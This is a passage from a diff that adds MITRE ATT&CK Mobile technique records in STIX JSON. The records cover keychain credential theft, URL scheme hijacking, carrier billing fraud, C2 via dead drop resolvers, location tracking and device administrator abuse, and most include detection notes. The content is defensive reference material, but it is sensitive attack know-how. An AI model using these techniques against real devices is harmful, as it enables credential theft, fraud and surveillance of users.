By utilizing a privilege escalation exploit or existing root access, adversaries can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can potentially detect jailbroken devices. Application vetting services may be able to detect known privilege escalation exploits contained within applications, as well as searching application packages for strings that correlate to known password store locations.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "created": "2022-04-01T15:01:32.169Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1634/001", + "external_id": "T1634.001" + }, + { + "source_name": "Apple Keychain Services", + "description": "Apple, Inc.. (n.d.). Keychain Services. Retrieved June 24, 2020.", + "url": "https://developer.apple.com/documentation/security/keychain_services" + }, + { + "source_name": "Elcomsoft Decrypt Keychain", + "description": "V. Katalov. (2018, December 18). Six Ways to Decrypt iPhone Passwords from the Keychain. 
Retrieved June 24, 2020.", + "url": "https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html", + "external_id": "AUT-11" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--88932a8c-3a17-406f-9431-1da3ff19f6d6", + "created": "2017-10-25T14:48:29.092Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1403", + "url": "https://attack.mitre.org/techniques/T1403" + }, + { + "source_name": "Sabanal-ART", + "url": "https://www.blackhat.com/docs/asia-15/materials/asia-15-Sabanal-Hiding-Behind-ART-wp.pdf", + "description": "Paul Sabanal. (2015). Hiding Behind ART. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "ART (the Android Runtime) compiles optimized code on the device itself to improve performance. An adversary may be able to use escalated privileges to modify the cached code in order to hide malicious behavior. 
Since the code is compiled on the device, it may not receive the same level of integrity checks that are provided to code running in the system partition.(Citation: Sabanal-ART)", + "modified": "2022-04-06T15:46:29.338Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Modify Cached Executable Code", + "x_mitre_detection": "Modifications to cached executable code can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversary behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--89fcd02f-62dc-40b9-a54b-9ac4b1baef05", + "type": "attack-pattern", + "created": "2017-10-25T14:48:28.456Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "external_id": "T1419", + "url": "https://attack.mitre.org/techniques/T1419", + "source_name": "mitre-mobile-attack" + }, + { + "url": "https://developer.android.com/reference/android/os/Build", + "description": "Android. (n.d.). Build. Retrieved December 21, 2016.", + "source_name": "Android-Build" + } + ], + "modified": "2019-10-16T13:24:48.936Z", + "name": "Device Type Discovery", + "description": "On Android, device type information is accessible to apps through the android.os.Build class (Citation: Android-Build). 
Device information could be used to target privilege escalation exploits.", + "kill_chain_phases": [ + { + "phase_name": "discovery", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--8c7862ff-3449-4ac6-b0fd-ac1298a822a5", + "created": "2020-05-04T13:49:34.706Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1576", + "url": "https://attack.mitre.org/techniques/T1576" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-43" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:\n\n* Abusing device owner permissions to perform silent uninstallation using device owner API calls.\n* Abusing root permissions to delete files from the filesystem.\n* Abusing the accessibility service. 
This requires an intent be sent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.", + "modified": "2022-03-30T19:34:09.371Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Uninstall Malicious Application", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--8e27551a-5080-4148-a584-c64348212e4f", + "created": "2017-10-25T14:48:31.694Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1447", + "url": "https://attack.mitre.org/techniques/T1447" + }, + { + "source_name": "Android DevicePolicyManager 2019", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html", + "description": "Android Developers. (n.d.). DevicePolicyManager. Retrieved September 22, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location. 
(Citation: Android DevicePolicyManager 2019)\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.", + "modified": "2022-03-30T19:50:37.727Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Delete Device Data", + "x_mitre_detection": "Mobile security products can detect which applications can request device administrator permissions. Users can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--8f0e39c6-82c9-41ec-9f93-5696c0f2e274", + "created": "2017-10-25T14:48:09.082Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1448", + "url": "https://attack.mitre.org/techniques/T1448" + }, + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . 
Retrieved April 27, 2020." + }, + { + "source_name": "AndroidSecurity2014", + "url": "https://static.googleusercontent.com/media/source.android.com/en//security/reports/Google_Android_Security_2014_Report_Final.pdf", + "description": "Google. (2014). Android Security 2014 Year in Review. Retrieved December 12, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in several different ways, including SMS toll fraud and SMS shortcodes that make purchases.\n\nPerforming SMS fraud relies heavily upon the fact that, when making SMS purchases, the carriers perform device verification but not user verification. This allows adversaries to make purchases on behalf of the user, with little or no user interaction.(Citation: Google Bread)\n\nMalicious applications may also perform toll billing, which occurs when carriers provide payment endpoints over a web page. The application connects to the web page over cellular data so the carrier can directly verify the number, or the application must retrieve a code sent via SMS and enter it into the web page.(Citation: Google Bread)\n\nOn iOS, apps cannot send SMS messages.\n\nOn Android, apps must hold the `SEND_SMS` permission to send SMS messages. 
Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).", + "modified": "2022-04-06T13:57:38.841Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Carrier Billing Fraud", + "x_mitre_detection": "Starting with Android 4.2 the user is prompted and must provide consent before applications can send SMS messages to premium numbers.(Citation: AndroidSecurity2014)\n\nOn Android 6.0 and up, the user can view which applications have permission to send SMS messages through the device settings screen, and the user can choose to revoke the permissions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--8f142a25-f6c3-4520-bd50-2ae3ab50ed3e", + "type": "attack-pattern", + "created": "2017-10-25T14:48:17.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1415", + "external_id": "T1415" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-10.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "AUT-10" + }, + { + "source_name": "FireEye-Masque2", + "description": "Hui Xue, Tao Wei, Yulong Zhang, Song Jin, Zhaofeng Chen. (2015, February 19). 
IOS MASQUE ATTACK REVIVED: BYPASSING PROMPT FOR TRUST AND APP URL SCHEME HIJACKING. Retrieved December 21, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html" + }, + { + "source_name": "Dhanjani-URLScheme", + "description": "Nitesh Dhanjani. (2010, November 8). Insecure Handling of URL Schemes in Apple’s iOS. Retrieved December 21, 2016.", + "url": "http://www.dhanjani.com/blog/2010/11/insecure-handling-of-url-schemes-in-apples-ios.html" + }, + { + "source_name": "IETF-PKCE", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016.", + "url": "https://tools.ietf.org/html/rfc7636" + }, + { + "source_name": "MobileIron-XARA", + "description": "Michael T. Raggo. (2015, October 1). iOS URL Scheme Hijacking (XARA) Attack Analysis and Countermeasures. Retrieved December 21, 2016.", + "url": "https://www.mobileiron.com/en/smartwork-blog/ios-url-scheme-hijacking-xara-attack-analysis-and-countermeasures" + } + ], + "modified": "2020-10-23T15:05:40.674Z", + "name": "URL Scheme Hijacking", + "description": "An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme). 
This technique, for example, could be used to capture OAuth authorization codes(Citation: IETF-PKCE) or to phish user credentials(Citation: MobileIron-XARA).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-16T13:32:55.266Z", + "name": "Bidirectional Communication", + "description": "Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to and receiving output from a compromised system. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\n \n\nPopular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "created": "2022-04-06T15:47:06.071Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1481/002", + "external_id": "T1481.002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:51:58.228Z", + "name": "Non-Standard Port", + "description": "Adversaries may generate network traffic using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting reports may show network communications performed by the application, including hosts, ports, protocols, and URLs. Further detection would most likely be at the enterprise level, through packet and/or netflow inspection. 
Many properly configured firewalls may also naturally block command and control traffic over non-standard ports.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "created": "2019-08-01T13:44:09.368Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1509", + "external_id": "T1509" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:32:37.109Z", + "name": "Compromise Software Supply Chain", + "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can detect malicious code in applications. 
System partition integrity checking mechanisms can detect unauthorized or malicious code contained in the system partition.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "created": "2022-03-28T19:25:17.596Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1474/003", + "external_id": "T1474.003" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html", + "external_id": "SPC-4" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-11.html", + "external_id": "SPC-11" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-12.html", + "external_id": "SPC-12" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-18.html", + "external_id": "SPC-18" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html", + "external_id": "SPC-20" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:56:04.790Z", + "name": "Dead Drop Resolver", + "description": "Adversaries may use an existing, legitimate external Web service to host 
information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers. \n\n \n\nPopular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. \n\n \n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis, or enable operational resiliency (since this infrastructure may be dynamically changed). ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. 
", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "created": "2022-04-06T15:41:03.914Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1481/001", + "external_id": "T1481.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:50:21.363Z", + "name": "Location Tracking", + "description": "Adversaries may track a device’s physical location through use of standard operating system APIs via malicious or exploited applications on the compromised device. \n\n \n\nOn Android, applications holding the `ACCESS_COAURSE_LOCATION` or `ACCESS_FINE_LOCATION` permissions provide access to the device’s physical location. 
On Android 10 and up, declaration of the `ACCESS_BACKGROUND_LOCATION` permission in an application’s manifest will allow applications to request location access even when the application is running in the background.(Citation: Android Request Location Permissions) Some adversaries have utilized integration of Baidu map services to retrieve geographical location once the location access permissions had been obtained.(Citation: PaloAlto-SpyDealer)(Citation: Palo Alto HenBox) \n\n \n\nOn iOS, applications must include the `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` keys in their `Info.plist` file depending on the extent of requested access to location information.(Citation: Apple Requesting Authorization for Location Services) On iOS 8.0 and up, applications call `requestWhenInUseAuthorization()` to request access to location information when the application is in use or `requestAlwaysAuthorization()` to request access to location information regardless of whether the application is in use. With elevated privileges, an adversary may be able to access location data without explicit user consent with the `com.apple.locationd.preauthorized` entitlement key.(Citation: Google Project Zero Insomnia)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Android applications requesting the `ACCESS_COARSE_LOCATION`, `ACCESS_FINE_LOCATION`, or `ACCESS_BACKGROUND_LOCATION` permissions and iOS applications including the `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` keys in their `Info.plist` file could be scrutinized during the application vetting process. 
\n\n \n\nIn both Android (6.0 and up) and iOS, users can view which applications have the permission to access the device location through the device settings screen and revoke permissions as necessary. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "created": "2017-10-25T14:48:12.267Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1430", + "external_id": "T1430" + }, + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + }, + { + "source_name": "Android Request Location Permissions", + "description": "Android Developers. (2022, March 24). Request Location Permissions. Retrieved April 1, 2022.", + "url": "https://developer.android.com/training/location/permissions" + }, + { + "source_name": "Apple Requesting Authorization for Location Services", + "description": "Apple Developers. (n.d.). Requesting Authorization for Location Services. Retrieved April 1, 2022.", + "url": "https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services" + }, + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + }, + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). 
SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-24.html", + "external_id": "APP-24" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:56:34.537Z", + "name": "Device Administrator Permissions", + "description": "Adversaries may abuse Android’s device administration API to obtain a higher degree of control over the device. By abusing the API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642), factory resetting the device for [File Deletion](https://attack.mitre.org/techniques/T1630/002) and to delete any traces of the malware, disabling all the device’s cameras, or to make it more difficult to uninstall the app.\n\nDevice administrators must be approved by the user at runtime, with a system popup showing which actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users are prompted for approval when an application requests device administrator permissions. Users can see which applications are registered as device administrators in the device settings. 
Application vetting services can check for the string `BIND_DEVICE_ADMIN` in the application’s manifest. This indicates it can prompt the user for device administrator permissions.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "created": "2022-04-01T15:59:05.830Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1626/001", + "external_id": "T1626.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "created": "2017-10-25T14:48:17.886Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1446", + "url": "https://attack.mitre.org/techniques/T1446" + }, + { + "source_name": "Xiao-KeyRaider", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. 
Retrieved December 12, 2016." + }, + { + "source_name": "Android resetPassword", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)", + "description": "Google. (n.d.). DevicePolicyManager. Retrieved October 1, 2019." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-28" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary may seek to lock the legitimate user out of the device, for example to inhibit user interaction or to obtain a ransom payment.\n\nOn Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode to prevent the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android resetPassword)\n\nOn iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode, they cannot set a new passcode. 
